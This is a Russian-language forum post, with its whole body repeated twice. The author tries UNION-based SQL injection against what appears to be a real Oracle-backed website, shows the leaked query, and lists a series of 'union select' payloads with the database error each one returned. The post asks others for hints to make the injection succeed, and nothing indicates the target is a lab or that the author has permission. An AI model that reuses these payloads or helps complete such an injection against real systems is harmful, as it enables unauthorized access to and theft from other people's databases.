m2infect
02.08.2006, 13:03
Всем доброго дня/вечера/ночи!
Хочу выполнить SQL injection. Но ТОЛЬКО! хотеть - этого мало, нужно УМЕТЬ!, посему создана эта тема.
Сообственно ошибка.
SELECT
c.clientss_id, c.clientss_name, nc.news_clientss_inf,
TO_CHAR(nc.news_clientss_date, `DD.MM.YY`) news_date1,
nc.news_clientss_inform, nc.news_clientss_id
FROM
ANY.NEWS_CLIENTSS nc, ANY.clientss c
where
c.clientss_id=nc.clientss_id and c.clientss_id=33`
ORDER BY
nc.news_clientss_date DESC
Структура запроса.
SELECT ....... FROM ........ where ............. ORDER BY
Дописываю его.
33 union select 1,2,3,4,5,6 from nc-
таблица или представление пользователя не существует
0 union select 1,2,3,4,5,6 from clients_name--
таблица или представление пользователя не существует
Пробывал множество вариантов, и если честно - встал в тупик.
А особенно после этого.
1 union select 1,2,3,4,7,6,7 from ANY.clientss c--
в блоке запроса неверное число столбцов результата
Если добавить/убрать столбцы - результат ош. не меняется. Ну это понятно почему.
Далее...
1 union select 1,2,3,4,7,`6` from ANY.clientss c--
`6`: недопустимый идентификатор
пишу
1 union select 1,2,3,4,7,6 from ANY.clientss c--
в ответ `NC`.`NEWS_CLIENTSS_DATE`: недопустимый идентификатор
как так получилось? :confused: :mad:
1 union select 1,2,3,4,7,6 from ANY.clientss where `1`=`1`--
неверен реляционный оператор
О иньк. в оракл мало что нашел.
Что можно еще попробывать?
Буду очень благодарен, за ссылки/подсказки.
С уважением.
Хочу выполнить SQL injection. Но ТОЛЬКО! хотеть - этого мало, нужно УМЕТЬ!, посему создана эта тема.
Сообственно ошибка.
SELECT
c.clientss_id, c.clientss_name, nc.news_clientss_inf,
TO_CHAR(nc.news_clientss_date, `DD.MM.YY`) news_date1,
nc.news_clientss_inform, nc.news_clientss_id
FROM
ANY.NEWS_CLIENTSS nc, ANY.clientss c
where
c.clientss_id=nc.clientss_id and c.clientss_id=33`
ORDER BY
nc.news_clientss_date DESC
Структура запроса.
SELECT ....... FROM ........ where ............. ORDER BY
Дописываю его.
33 union select 1,2,3,4,5,6 from nc-
таблица или представление пользователя не существует
0 union select 1,2,3,4,5,6 from clients_name--
таблица или представление пользователя не существует
Пробывал множество вариантов, и если честно - встал в тупик.
А особенно после этого.
1 union select 1,2,3,4,7,6,7 from ANY.clientss c--
в блоке запроса неверное число столбцов результата
Если добавить/убрать столбцы - результат ош. не меняется. Ну это понятно почему.
Далее...
1 union select 1,2,3,4,7,`6` from ANY.clientss c--
`6`: недопустимый идентификатор
пишу
1 union select 1,2,3,4,7,6 from ANY.clientss c--
в ответ `NC`.`NEWS_CLIENTSS_DATE`: недопустимый идентификатор
как так получилось? :confused: :mad:
1 union select 1,2,3,4,7,6 from ANY.clientss where `1`=`1`--
неверен реляционный оператор
О иньк. в оракл мало что нашел.
Что можно еще попробывать?
Буду очень благодарен, за ссылки/подсказки.
С уважением.